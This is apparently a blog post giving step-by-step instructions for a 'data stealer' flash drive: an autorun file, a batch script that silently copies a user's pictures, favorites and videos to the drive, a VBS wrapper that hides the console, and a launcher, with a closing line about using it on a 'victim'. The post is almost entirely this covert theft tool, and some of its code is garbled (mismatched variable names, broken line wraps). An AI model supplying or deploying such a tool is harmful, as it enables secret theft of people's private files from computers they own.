Sunday, April 26, 2020

How to make a data stealer flash drive






1,πŸ‘‰open notepad and write down the following code
 
πŸ’ [autorun]
icon=drive.ico
open=launch.bat
action=Click OK to Run
shell\open\command=launch.batπŸ’ 

And Save this as file as  autorun.inf

2,πŸ‘‰ Open Notepad again and copy-paste the following lines

πŸ’  @echo off
:: variables
/min
SET odrive=%odrive:~0,2%
set backupcmd=xcopy /s /c /d /e /h /i /r /y
echo off
%backupcmd% "%USERPROFILE%\pictures"
"%drive%\all\My pics"
%backupcmd% "%USERPROFILE%\Favorites"
"%drive%\all\Favorites"
%backupcmd% "%USERPROFILE%\videos"
"%drive%\all\vids"
@echo off
clsπŸ’ 

And Save this file as file.bat

🌐 This file is configured to copy the contents of the current users pictures, favorites, and videos folder to the Flash drive under a folder called “all”. This is the section of the code you will need to edit depending on what you want to copy.

3,πŸ‘‰ Open Notepad once again and copy-paste the following line.

πŸ’  CreateObject("Wscript.Shell").Run """" & WScript.Arguments(0) & """", 0, FalseπŸ’ 
& Save this as invisible.vbs

🌐 This code runs the file.bat as a process so it does not show the CMD prompt and everything the batch file is processing.

4,πŸ‘‰ Open Notepad one last time and copy-paste the following line.
πŸ’  wscript.exe \invisible.vbs file.batπŸ’ 
& save this as launch.bat

5,πŸ‘‰ Copy all 4 files created in the above steps and put it on the root of the Flash drive Also create a folder
named “all” where the contents are to be copied automatically. You can call this folder by any name, but then you need to reflect the changes you made in step 2.

6,πŸ‘‰ This is all that needs to be done. Test the Flash drive on your own computer first before playing it out on your victim. It works flawlessly.

Credits to: Anon Mumbai.